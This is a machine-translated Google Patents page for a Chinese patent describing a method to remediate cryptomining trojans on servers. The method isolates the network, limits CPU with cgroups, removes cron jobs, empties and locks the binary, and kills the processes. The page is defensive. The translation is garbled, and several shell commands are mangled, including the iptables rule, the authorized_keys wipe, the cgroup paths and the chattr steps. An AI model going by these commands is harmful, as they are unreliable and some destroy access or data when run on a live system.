CN110879887A - Method, device, equipment and medium for repairing mining trojan program - Google Patents
Method, device, equipment and medium for repairing mining trojan program Download PDFInfo
- Publication number
- CN110879887A CN110879887A CN201911121661.9A CN201911121661A CN110879887A CN 110879887 A CN110879887 A CN 110879887A CN 201911121661 A CN201911121661 A CN 201911121661A CN 110879887 A CN110879887 A CN 110879887A
- Authority
- CN
- China
- Prior art keywords
- program
- server
- mining
- trojan horse
- trojan
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/566—Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/568—Computer malware detection or handling, e.g. anti-virus arrangements eliminating virus, restoring damaged files
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
- G06F21/577—Assessing vulnerabilities and evaluating computer system security
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Theoretical Computer Science (AREA)
- Software Systems (AREA)
- Health & Medical Sciences (AREA)
- General Physics & Mathematics (AREA)
- Physics & Mathematics (AREA)
- Virology (AREA)
- General Health & Medical Sciences (AREA)
- Computing Systems (AREA)
- Debugging And Monitoring (AREA)
- Information Retrieval, Db Structures And Fs Structures Therefor (AREA)
Abstract
The application discloses a method, a device, equipment and a medium for repairing a mine digging Trojan horse program. The method comprises the following steps: cutting off the communication between the server attacked by the mining Trojan horse program and the outside; limiting CPU usage of the mining Trojan horse process of the server to recover normal service application of the server; closing a timing task in the mining Trojan horse digging program, and clearing the mining Trojan horse digging program; and checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied. It can be seen that this application cuts off earlier by the server of digging the attack of ore trojan program and external communication, restricts again the server dig the CPU of ore trojan process and use, resume the normal service application of server, then handle dig the ore trojan program with dig the ore trojan process, can resume fast like this and be dug the normal service on the server of ore trojan program invasion, and can not pull up or start the back automatic recovery again after the trojan process is killed, has suppressed and has dug the propagation of ore trojan on the LAN.
Description
Technical Field
The application relates to the technical field of network security, in particular to a method, a device, equipment and a medium for repairing a mine digging Trojan horse program.
Background
After the server connected with the external network is invaded by the mining Trojan horse program, a large amount of CPU is occupied for mining. The CPU continuously runs at a high speed, the electric quantity is seriously consumed, and after a mining Trojan horse program occupies a large amount of CPU to excavate a mine, the original normal service on the server can not be improved due to insufficient resources. The existing restoration method for the mining Trojan horse program mainly comprises the following steps: firstly, the mine digging Trojan horse process and the daemon process are killed, then the mine digging Trojan horse program and the timing task are deleted, and then the attacker host is forbidden by the fireproof wall. Secondly, killing the mining Trojan horse program and the daemon process, deleting the mining Trojan horse program, the infected files and the suspicious files, and then deleting the timing task of the mining Trojan horse program. And thirdly, deleting the timing task of the mining Trojan program, deleting the infected file and the suspicious file, and then killing the mining Trojan process. In the existing restoring process of the mining Trojan program, normal service is slowly restored, the mining Trojan program can be automatically pulled up after being killed, the mining Trojan can be automatically restored after the mining Trojan program is started, and a server is controlled by a remote hacker.
Disclosure of Invention
In view of the above, an object of the present application is to provide a method, an apparatus, a device, and a medium for repairing a Trojan mining program, which can quickly recover normal services on a server invaded by the Trojan mining program, and prevent the Trojan mining program from being propagated on a local area network because the Trojan mining process is killed and cannot be automatically pulled up or recovered after the Trojan mining program is started. The specific scheme is as follows:
in a first aspect, the application discloses a method for repairing a mining Trojan horse program, comprising the following steps:
cutting off the communication between the server attacked by the mining Trojan horse program and the outside;
limiting CPU usage of the mining Trojan horse process of the server to recover normal service application of the server;
closing a timing task in the mining Trojan horse digging program, and clearing the mining Trojan horse digging program;
and checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
Optionally, the cutting off communication between the server attacked by the mining trojan and the outside includes:
limiting the port vulnerability of the server from being exposed to the outside;
regenerating the key and emptying the external network host which can be logged in without secret;
modifying the DNS in the server so that the server cannot resolve the outer network domain name;
and moving a target instruction in the server from a source directory to a target directory to prevent a daemon process of the mining Trojan horse program from automatically pulling the latest code.
Optionally, the limiting the port vulnerability of the server from being exposed to the outside includes:
closing a vulnerability port in the server to limit the port vulnerability of the server from being exposed to the outside;
and/or, adding a firewall to limit the port vulnerability of the server from being exposed to the outside.
Optionally, the closing the timing task in the mining Trojan horse digging program and clearing the mining Trojan horse digging program includes:
closing a crond timing task in the mining Trojan horse program;
and modifying the mining Trojan horse digging program into an empty file, and locking the empty file.
Optionally, after the searching and killing the mining trojan process which is still in the running state after the Trojan program is emptied, the method further includes:
closing the mine digging Trojan horse program capable of starting up and starting up automatically;
processing the environment configuration file;
using a virus killing tool to check and kill the residual mining Trojan horse program;
and restoring the instruction environment in the server to finish the restoration of the mining Trojan.
Optionally, the limiting the CPU usage of the mining trojan process of the server to recover the normal service application of the server includes:
and limiting the CPU usage of the mining Trojan horse process of the server by using a cgroup technology so as to recover the normal service application of the server.
Optionally, the limiting, by using a cgroup technology, CPU usage of the mining trojan horse process of the server to recover normal service application of the server includes:
creating a cgroup restriction group;
limiting CPU usage of the cgroup limit group to resume normal service applications of the server.
In a second aspect, the present application discloses an excavation trojan program repair device, including:
the communication cutting-off module is used for cutting off the communication between the server attacked by the mining Trojan horse program and the outside;
the limiting module is used for limiting the CPU usage of the mining Trojan horse digging process of the server so as to recover the normal service application of the server;
the task closing module is used for closing the timing task in the process of digging the mine Trojan horse;
the program emptying module is used for emptying the mine digging Trojan horse program;
and the process searching and killing module is used for searching and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
In a third aspect, the present application discloses a mining Trojan program repair device, comprising:
a memory and a processor;
wherein the memory is used for storing a computer program;
the processor is used for executing the computer program to realize the mining Trojan horse program repairing method disclosed in the foregoing.
In a fourth aspect, the present application discloses a computer readable storage medium for storing a computer program, wherein the computer program, when executed by a processor, implements the method for repairing a mining Trojan horse disclosed in the foregoing.
Therefore, the communication between the server attacked by the mining Trojan horse program and the outside is cut off firstly; then, the CPU usage of the mining Trojan horse process of the server is limited so as to recover the normal service application of the server; then closing a timing task in the mining Trojan horse digging program, and emptying the mining Trojan horse digging program; and then checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied. Therefore, the communication between the server attacked by the mining Trojan program and the outside is cut off firstly, the server is limited again, the CPU of the mining Trojan process of the server is used, the normal service application of the server is recovered, the timing task is closed again, the corresponding mining Trojan program is emptied, the searching and killing are emptied, the mining Trojan program is still in an operating state, the normal service on the server invaded by the mining Trojan program can be rapidly recovered, the mining Trojan process is not automatically pulled up or automatically recovered after being started after being killed, and the propagation of the mining Trojan program on a local area network is restrained.
Drawings
In order to more clearly illustrate the embodiments of the present application or the technical solutions in the prior art, the drawings needed to be used in the description of the embodiments or the prior art will be briefly introduced below, it is obvious that the drawings in the following description are only embodiments of the present application, and for those skilled in the art, other drawings can be obtained according to the provided drawings without creative efforts.
FIG. 1 is a flow chart of a mining Trojan horse program repair method disclosed in the present application;
FIG. 2 is a flow chart of a particular method for repairing a mine excavation Trojan horse program disclosed herein;
FIG. 3 is a flowchart of a particular method for repairing a mine excavation Trojan horse program disclosed herein;
FIG. 4 is a schematic structural diagram of a mining Trojan horse program repair device disclosed in the present application;
FIG. 5 is a block diagram of a mining Trojan horse program repair apparatus disclosed in the present application;
fig. 6 is a diagram of a server structure disclosed in the present application.
Detailed Description
The technical solutions in the embodiments of the present application will be clearly and completely described below with reference to the drawings in the embodiments of the present application, and it is obvious that the described embodiments are only a part of the embodiments of the present application, and not all of the embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present application.
At present, the method for repairing the mining Trojan horse program mainly comprises the following steps: firstly, the mine digging Trojan horse process and the daemon process are killed, then the mine digging Trojan horse program and the timing task are deleted, and then the attacker host is forbidden by the fireproof wall. Secondly, killing the mining Trojan horse program and the daemon process, deleting the mining Trojan horse program, the infected files and the suspicious files, and then deleting the timing task of the mining Trojan horse program. And thirdly, deleting the timing task of the mining Trojan program, deleting the infected file and the suspicious file, and then killing the mining Trojan process. In the existing restoring process of the mining Trojan program, normal service is slowly restored, the mining Trojan program can be automatically pulled up after being killed, the mining Trojan can be automatically restored after the mining Trojan program is started, and a server is controlled by a remote hacker. In view of this, the present application provides a method for repairing a mining trojan program, which can quickly recover normal services on a server invaded by the mining trojan program, and the mining trojan process is killed and then cannot be automatically pulled up or automatically recovered after being started, so that propagation of the mining trojan program on a local area network is suppressed.
The embodiment of the application discloses a method for repairing a mining Trojan horse program, which is shown in figure 1 and comprises the following steps:
step S11: and cutting off the communication between the server attacked by the mining Trojan horse program and the outside.
In this embodiment, after a server is attacked by a mine digging Trojan horse program, communication between the server and the outside needs to be cut off first, so as to prevent the mine digging Trojan horse program from being spread in a local area network, which causes other devices in the local area network to be attacked by the mine digging Trojan horse program, and further causes the whole local area network to be attacked by the mine digging Trojan horse program.
Step S12: limiting CPU usage of the server's mine vaulting process to resume normal service applications of the server.
In a specific embodiment, after the server is attacked by the mining trojan, the communication between the server and the outside is cut off, and then the use of a CPU of the mining trojan process in the server is limited, so that the problem that the original normal service cannot normally run due to insufficient resources can be avoided, and the normal service application of the server is quickly recovered. The CPU usage of the mining Trojan horse process in the server is firstly limited to recover the normal service application of the server, but the mining Trojan horse process is not directly killed, because the corresponding daemon process can also automatically pull up after the mining Trojan horse process is directly killed.
Step S13: closing the timing task in the mining Trojan horse digging program, and emptying the mining Trojan horse digging program.
It will be appreciated that after normal service application of the server is resumed, the timed tasks in the mine vaulting horse need to be shut down and the mine vaulting horse program emptied. Wherein the mining Trojan program includes, but is not limited to, a script file and a binary executable file of the mining Trojan program.
Step S14: and checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
In a specific implementation process, after the mining Trojan digging program is emptied, the mining Trojan digging process which is still in a running state after the mining Trojan digging program is emptied is searched and killed. After the mining Trojan horse program is emptied, some mining Trojan horse processes are in a running state, so the mining Trojan horse processes in the running state are checked and killed. After the process of digging the mine trojans is searched and killed, corresponding subsequent treatment is required to be carried out so as to completely repair the process of digging the mine trojans.
Therefore, the communication between the server attacked by the mining Trojan horse program and the outside is cut off firstly; then, the CPU usage of the mining Trojan horse process of the server is limited so as to recover the normal service application of the server; then closing a timing task in the mining Trojan horse digging program, and emptying the mining Trojan horse digging program; and then checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied. Therefore, the communication between the server attacked by the mining Trojan program and the outside is cut off firstly, the server is limited again, the CPU of the mining Trojan process of the server is used, the normal service application of the server is recovered, the timing task is closed again, the corresponding mining Trojan program is emptied, the searching and killing are emptied, the mining Trojan program is still in an operating state, the normal service on the server invaded by the mining Trojan program can be rapidly recovered, the mining Trojan process is not automatically pulled up or automatically recovered after being started after being killed, and the propagation of the mining Trojan program on a local area network is restrained.
Referring to fig. 2, an embodiment of the present application discloses a specific method for repairing a mining Trojan horse program, which includes:
step S21: and limiting the port vulnerability of the server from being exposed to the outside.
In a specific implementation process, to cut off communication between a server attacked by a mining trojan horse program and the outside, it is necessary to limit the port leak of the server from being exposed to the outside. Limiting the port vulnerability of the server from being exposed to the outside, comprising: closing a vulnerability port in the server to limit the port vulnerability of the server from being exposed to the outside; and/or, adding a firewall to limit the port vulnerability of the server from being exposed to the outside. Specifically, the vulnerability port in the server can be directly closed to limit the port vulnerability of the server from being exposed to the outside. Firewalls may also be added to limit the exposure of port vulnerabilities of the servers. And closing a vulnerability port in the server, and adding a firewall to limit the port vulnerability of the server from being exposed to the outside. For example, for 2375 port, port vulnerabilities may be limited from exposure to the outside by: iptables-I INPUT-p tcp-dport 2375-j DROP.
Step S22: and regenerating the key and emptying the external network host which can be logged in without secret.
It can be understood that after limiting the port vulnerability of the server from being exposed to the outside, the local key also needs to be regenerated, and the external network host which can log in without secret needs to be cleared. And regenerating a local secret key, and emptying the external network host which can be logged in without secret, so that the server can not connect the original secret-free host any more, and the condition that the mining Trojan horse program attacks other external network hosts along network connection is avoided. For example, the native key may be regenerated by flushing the cryptographically registrable extranet host and adding the native key:
ssh-keygen-t rsa-P "-f-/. ssh/id _ rsa (generating local key)
echo-/. ssh/authorized _ keys (clearing out the external network host which can be logged in without secret, adding local secret key)
Step S23: modifying the DNS in the server such that the server cannot resolve the foreign domain name.
In a specific implementation process, after the external network host capable of being logged in without secret is emptied, a Domain Name System (DNS) in the server needs to be modified, so that the server cannot resolve an external network Domain Name, and the server cannot be connected to the internet. The modifying the DNS in the server comprises: annotate all nameservers in the/etc/resolv. conf file.
And step S24, moving the target instruction in the server from the source directory to the target directory to prevent the daemon process of the mining Trojan horse program from automatically pulling the latest code.
In this embodiment, in order to prevent the daemon process in the mining Trojan horse program from automatically pulling up, it is further required to move the target instruction in the server from the source directory to the target directory, so as to prevent the daemon process of the mining Trojan horse program from automatically pulling up the latest code. Wherein the target instruction includes, but is not limited to, a wget/curl/scp instruction; the source directory includes but is not limited to/usr/bin; the target directory includes but is not limited to/home. For example, the wget/curl/scp instruction in the server may be moved from a source directory to a target directory by: bak, mv/usr/bin/wget.
Step S25: and limiting the CPU usage of the mining Trojan horse process of the server by using a cgroup technology so as to recover the normal service application of the server.
In this embodiment, after the server is segmented and communicates with the outside, the CPU of the process of mining the trojan horse of the server is restricted from using, so as to recover the normal service application of the server. Specifically, CPU usage of the mining Trojan horse process of the server is limited by using a cgroup technology so as to recover normal service application of the server. The limiting, by using a cgroup technology, the CPU usage of the mining trojan process of the server to recover normal service applications of the server includes: creating a cgroup restriction group; limiting CPU usage of the cgroup limit group to resume normal service applications of the server. For example, restricting CPU usage of the server's mining trojan process using cgroup technology to restore normal service applications to the server may be implemented by:
mkdir/sys/fs/cgroup/cpu/tmplimit (creating cgroup restriction group)
echo 1000>/sys/fs/cgroup/CPU/container/CPU cfs _ period _ us (limiting CPU usage of the cgroup limit group)
Step S26: closing the crond timing task in the mining Trojan horse program.
In a specific implementation process, the timing task in the mining Trojan horse program also needs to be closed. That is, the crond timing task in the mine vaulting program is closed. For example, the following code may delete timed tasks in the mine vaulting program: crontab-e.
Step S27: and modifying the mining Trojan horse program into an empty file, and locking the empty file.
In this embodiment, after the timing task in the mine excavation trojan program is closed, the mine excavation trojan program needs to be modified into an empty file, and the empty file is locked. Specifically, the mining trojan program is found through a mining trojan process PID (process identifier), and since the mining trojan program is usually locked, the mining trojan program needs to be unlocked, then the mining trojan program is emptied, and then the empty file is locked. For example, modifying the mine mining trojan program into an empty file and locking the empty file may be implemented by:
ll/proc/[ PID ]/exe (find the mine excavation Trojan program by the mine excavation Trojan process PID)
chattr-i A (unlocking the mine digging Trojan program)
echo > A (emptying the mine digging Trojan program)
chattr + i A (locking dead file)
Step S28: and checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
In this embodiment, the mining trojan program is modified into an empty file, the empty file is locked, and the mining trojan process which is still in a running state after the trojan program is emptied needs to be checked and killed. For example, the mining trojan process which is still in a running state after the trojan program is emptied can be killed by the following programs: kill-9[ PID ].
Referring to fig. 3, an embodiment of the present application discloses a specific method for repairing a mining Trojan horse program, including:
step S301: and limiting the port vulnerability of the server from being exposed to the outside.
Step S302: and regenerating the key and emptying the external network host which can be logged in without secret.
Step S303: modifying the DNS in the server such that the server cannot resolve the foreign domain name.
And step S304, moving the target instruction in the server from the source directory to the target directory to prevent the daemon process of the mining Trojan horse program from automatically pulling the latest code.
Step S305: and limiting the CPU usage of the mining Trojan horse process of the server by using a cgroup technology so as to recover the normal service application of the server.
Step S306: and closing the crond timing task in the mining Trojan horse digging process.
Step S307: and modifying the mining Trojan horse digging program into an empty file, and locking the empty file.
Step S308: and checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
Step S309: and closing the mining Trojan horse program capable of starting and starting automatically.
In this embodiment, after checking and killing the Trojan horse emptying program, the mine digging Trojan horse process which is still in a running state needs to be closed, and the mine digging Trojan horse program which can be started and started automatically needs to be closed. Specifically, all suspicious files below/etc/rc.d can be deleted to close the mining trojan program which can be started and started automatically.
Step S310: processing the environment configuration file.
In a particular implementation, a processing environment profile is also required. In particular, the environment configuration file can be processed by modifying the suspicious script in the bashrc file.
Step S311: and (5) using a virus killing tool to check and kill the residual mining Trojan horse program.
It will be appreciated that in case the quarry Trojan remains, the remaining quarry Trojan programs need to be scanned using a disinfection tool. Specifically, the remaining mine vaulting programs may be scanned using the antivirus tool, clamav, in case the mine vaulting is left.
Step S312: and restoring the instruction environment in the server to finish the restoration of the mining Trojan horse program.
In this embodiment, after the residual Trojan mining program is detected and killed by using the antivirus tool, the instruction environment in the server needs to be recovered to complete the remediation of the Trojan mining program. For example, in the foregoing process, the method further includes: the system command chattr is renamed to chattr.bak to prevent the Trojan horse program from being regenerated, and when the mining Trojan horse program is cleaned, the chattr.bak needs to be changed back to chattr.
Referring to fig. 4, an embodiment of the present application discloses a mining Trojan program repair device, including:
the communication cutting-off module 11 is used for cutting off the communication between the server attacked by the mining Trojan horse program and the outside;
a limiting module 12, configured to limit CPU usage of the mining trojan process of the server, so as to recover normal service application of the server;
a task closing module 13, configured to close a timing task in the mining Trojan horse excavation process;
a program clearing module 14 for clearing the mine digging Trojan program;
and the process searching and killing module 15 is used for searching and killing the mining Trojan horse process which is still in a running state after the Trojan horse program is emptied.
Therefore, the communication between the server attacked by the mining Trojan horse program and the outside is cut off firstly; then, the CPU usage of the mining Trojan horse process of the server is limited so as to recover the normal service application of the server; then closing a timing task in the mining Trojan horse digging program, and emptying the mining Trojan horse digging program; and then checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied. Therefore, the communication between the server attacked by the mining Trojan program and the outside is cut off firstly, the server is limited again, the CPU of the mining Trojan process of the server is used, the normal service application of the server is recovered, the timing task is closed again, the corresponding mining Trojan program is emptied, the searching and killing are emptied, the mining Trojan program is still in an operating state, the normal service on the server invaded by the mining Trojan program can be rapidly recovered, the mining Trojan process is not automatically pulled up or automatically recovered after being started after being killed, and the propagation of the mining Trojan program on a local area network is restrained.
Further, referring to fig. 5, an embodiment of the present application further discloses a mining Trojan program repair device, including: a processor 21 and a memory 22.
Wherein the memory 22 is used for storing a computer program; the processor 21 is configured to execute the computer program to implement the method for repairing the mining Trojan horse program disclosed in the foregoing embodiment.
For the specific process of the method for repairing the mining Trojan horse program, reference may be made to the corresponding contents disclosed in the foregoing embodiments, and details are not repeated herein.
Referring to fig. 6, the present application discloses a server 20 including a mining Trojan program repair device including a processor 21 and a memory 22 in the foregoing embodiment. For the steps that the processor 21 can specifically execute, reference may be made to corresponding contents disclosed in the foregoing embodiments, and details are not described herein again.
Further, the server 20 in this embodiment may further specifically include: a power supply 23, a communication interface 24, an input-output interface 25, and a communication bus 26; the power supply 23 is configured to provide a working voltage for each hardware device on the terminal 20; the communication interface 24 can be a data transmission channel between the terminal 20 and an external device, and a communication protocol followed by the communication interface is any communication protocol that can be used in the technical solution of the present application, and is not specifically limited herein; the input/output interface 25 is configured to obtain data input from the outside or output data to the outside, and a specific interface type thereof may be selected according to a specific application requirement, which is not specifically limited herein.
Further, an embodiment of the present application also discloses a computer readable storage medium for storing a computer program, wherein the computer program, when executed by a processor, implements the following steps:
cutting off the communication between the server attacked by the mining Trojan horse program and the outside; limiting CPU usage of the mining Trojan horse process of the server to recover normal service application of the server; closing a timing task in the mining Trojan horse digging program, and clearing the mining Trojan horse digging program; and checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
Therefore, the communication between the server attacked by the mining Trojan horse program and the outside is cut off firstly; then, the CPU usage of the mining Trojan horse process of the server is limited so as to recover the normal service application of the server; then closing a timing task in the mining Trojan horse digging program, and emptying the mining Trojan horse digging program; and then checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied. Therefore, the communication between the server attacked by the mining Trojan program and the outside is cut off firstly, the server is limited again, the CPU of the mining Trojan process of the server is used, the normal service application of the server is recovered, the timing task is closed again, the corresponding mining Trojan program is emptied, the searching and killing are emptied, the mining Trojan program is still in an operating state, the normal service on the server invaded by the mining Trojan program can be rapidly recovered, the mining Trojan process is not automatically pulled up or automatically recovered after being started after being killed, and the propagation of the mining Trojan program on a local area network is restrained.
In this embodiment, when the computer subprogram stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: limiting the port vulnerability of the server from being exposed to the outside; regenerating the key and emptying the external network host which can be logged in without secret; modifying the DNS in the server so that the server cannot resolve the outer network domain name; and moving a target instruction in the server from a source directory to a target directory to prevent a daemon process of the mining Trojan horse program from automatically pulling the latest code.
In this embodiment, when the computer subprogram stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: closing a vulnerability port in the server to limit the port vulnerability of the server from being exposed to the outside; and/or, adding a firewall to limit the port vulnerability of the server from being exposed to the outside.
In this embodiment, when the computer subprogram stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: closing the crond timing task in the process of digging the mine Trojan horse; and modifying the mining Trojan horse digging program into an empty file, and locking the empty file.
In this embodiment, when the computer subprogram stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: closing the mine digging Trojan horse program capable of starting up and starting up automatically; processing the environment configuration file; using a virus killing tool to check and kill the residual mining Trojan horse program; and restoring the instruction environment in the server to finish the restoration of the mining Trojan.
In this embodiment, when the computer subprogram stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: and limiting the CPU usage of the mining Trojan horse process of the server by using a cgroup technology so as to recover the normal service application of the server.
In this embodiment, when the computer subprogram stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: creating a cgroup restriction group; limiting CPU usage of the cgroup limit group to resume normal service applications of the server.
The embodiments are described in a progressive manner, each embodiment focuses on differences from other embodiments, and the same or similar parts among the embodiments are referred to each other. The device disclosed by the embodiment corresponds to the method disclosed by the embodiment, so that the description is simple, and the relevant points can be referred to the method part for description.
The steps of a method or algorithm described in connection with the embodiments disclosed herein may be embodied directly in hardware, in a software module executed by a processor, or in a combination of the two. A software module may reside in Random Access Memory (RAM), memory, Read Only Memory (ROM), electrically programmable ROM, electrically erasable programmable ROM, registers, hard disk, a removable disk, a CD-ROM, or any other form of storage medium known in the art.
Finally, it is further noted that, herein, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Also, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of other elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other identical elements in a process, method, article, or apparatus that comprises the element.
The method, the device, the equipment and the medium for repairing the mine digging Trojan horse program provided by the application are introduced in detail, a specific example is applied in the method to explain the principle and the implementation mode of the application, and the description of the embodiment is only used for helping to understand the method and the core idea of the application; meanwhile, for a person skilled in the art, according to the idea of the present application, there may be variations in the specific embodiments and the application scope, and in summary, the content of the present specification should not be construed as a limitation to the present application.
Claims (10)
1. A mining Trojan program repairing method is characterized by comprising the following steps:
cutting off the communication between the server attacked by the mining Trojan horse program and the outside;
limiting CPU usage of the mining Trojan horse process of the server to recover normal service application of the server;
closing a timing task in the mining Trojan horse digging program and emptying the mining Trojan horse digging program;
and checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
2. The method for repairing a mining Trojan horse program according to claim 1, wherein the cutting off communication between the server attacked by the mining Trojan horse program and the outside comprises:
limiting the port vulnerability of the server from being exposed to the outside;
regenerating the key and emptying the external network host which can be logged in without secret;
modifying the DNS in the server so that the server cannot resolve the outer network domain name;
and moving a target instruction in the server from a source directory to a target directory to prevent a daemon process of the mining Trojan horse program from automatically pulling the latest code.
3. The method according to claim 2, wherein limiting the port vulnerability of the server from being exposed to the outside comprises:
closing a vulnerability port in the server to limit the port vulnerability of the server from being exposed to the outside;
and/or, adding a firewall to limit the port vulnerability of the server from being exposed to the outside.
4. The method according to claim 1, wherein the closing of the timed tasks in the mining Trojan program and the emptying of the mining Trojan program comprises:
closing the crond timing task in the process of digging the mine Trojan horse;
and modifying the mining Trojan horse digging program into an empty file, and locking the empty file.
5. The method for repairing a mining trojan program according to claim 1, wherein after the checking and killing the mining trojan process which is still in a running state after the cleaning of the trojan program, the method further comprises:
closing the mine digging Trojan horse program capable of starting up and starting up automatically;
processing the environment configuration file;
using a virus killing tool to check and kill the residual mining Trojan horse program;
and restoring the instruction environment in the server to finish the restoration of the mining Trojan horse program.
6. The method of anyone of claims 1 to 5, wherein said limiting CPU usage of the server's vaulting horse process to restore normal service applications to the server comprises:
and limiting the CPU usage of the mining Trojan horse process of the server by using a cgroup technology so as to recover the normal service application of the server.
7. The method of claim 6, wherein the using a cgroup technique to limit CPU usage of the server's vaulting horse process to restore normal service applications to the server comprises:
creating a cgroup restriction group;
limiting CPU usage of the cgroup limit group to resume normal service applications of the server.
8. A program repair device for a mining Trojan horse, comprising:
the communication cutting-off module is used for cutting off the communication between the server attacked by the mining Trojan horse program and the outside;
the limiting module is used for limiting the CPU usage of the mining Trojan horse digging process of the server so as to recover the normal service application of the server;
the task closing module is used for closing the timing task in the process of digging the mine Trojan horse;
the program emptying module is used for emptying the mine digging Trojan horse program;
and the process searching and killing module is used for searching and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
9. A mining trojan program repair device, comprising:
a memory and a processor;
wherein the memory is used for storing a computer program;
the processor is configured to execute the computer program to implement the method for repairing a mining Trojan horse according to any one of claims 1 to 7.
10. A computer-readable storage medium storing a computer program, wherein the computer program, when executed by a processor, implements the method of mining Trojan horse program repair of any one of claims 1 to 7.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201911121661.9A CN110879887B (en) | 2019-11-15 | 2019-11-15 | Method, device, equipment and medium for repairing mining trojan program |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201911121661.9A CN110879887B (en) | 2019-11-15 | 2019-11-15 | Method, device, equipment and medium for repairing mining trojan program |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN110879887A true CN110879887A (en) | 2020-03-13 |
| CN110879887B CN110879887B (en) | 2022-03-04 |
Family
ID=69729199
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201911121661.9A Active CN110879887B (en) | 2019-11-15 | 2019-11-15 | Method, device, equipment and medium for repairing mining trojan program |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN110879887B (en) |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN112052053A (en) * | 2020-10-10 | 2020-12-08 | 国科晋云技术有限公司 | Method and system for cleaning mining program in high-performance computing cluster |
| CN114697086A (en) * | 2022-03-17 | 2022-07-01 | 浪潮云信息技术股份公司 | Mining Trojan detection method based on depth canonical correlation analysis |
Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102982284A (en) * | 2012-11-30 | 2013-03-20 | 北京奇虎科技有限公司 | Scanning equipment, cloud management equipment and method and system used for malicious program checking and killing |
| US20150281271A1 (en) * | 2011-02-17 | 2015-10-01 | Red Hat, Inc. | Inhibiting denial-of-service attacks using group controls |
| CN106254339A (en) * | 2016-08-01 | 2016-12-21 | 北京比特大陆科技有限公司 | Dig safety certifying method and the system of mining industry business |
| CN107395395A (en) * | 2017-06-19 | 2017-11-24 | 国家电网公司 | The treating method and apparatus of security protection system |
| CN108900496A (en) * | 2018-06-22 | 2018-11-27 | 杭州安恒信息技术股份有限公司 | A kind of quick detection website is implanted the detection method and device of digging mine wooden horse |
| US20180359811A1 (en) * | 2015-01-26 | 2018-12-13 | Ievgen Verzun | Methods And Apparatus For HyperSecure Last Mile Communication |
-
2019
- 2019-11-15 CN CN201911121661.9A patent/CN110879887B/en active Active
Patent Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20150281271A1 (en) * | 2011-02-17 | 2015-10-01 | Red Hat, Inc. | Inhibiting denial-of-service attacks using group controls |
| CN102982284A (en) * | 2012-11-30 | 2013-03-20 | 北京奇虎科技有限公司 | Scanning equipment, cloud management equipment and method and system used for malicious program checking and killing |
| US20180359811A1 (en) * | 2015-01-26 | 2018-12-13 | Ievgen Verzun | Methods And Apparatus For HyperSecure Last Mile Communication |
| CN106254339A (en) * | 2016-08-01 | 2016-12-21 | 北京比特大陆科技有限公司 | Dig safety certifying method and the system of mining industry business |
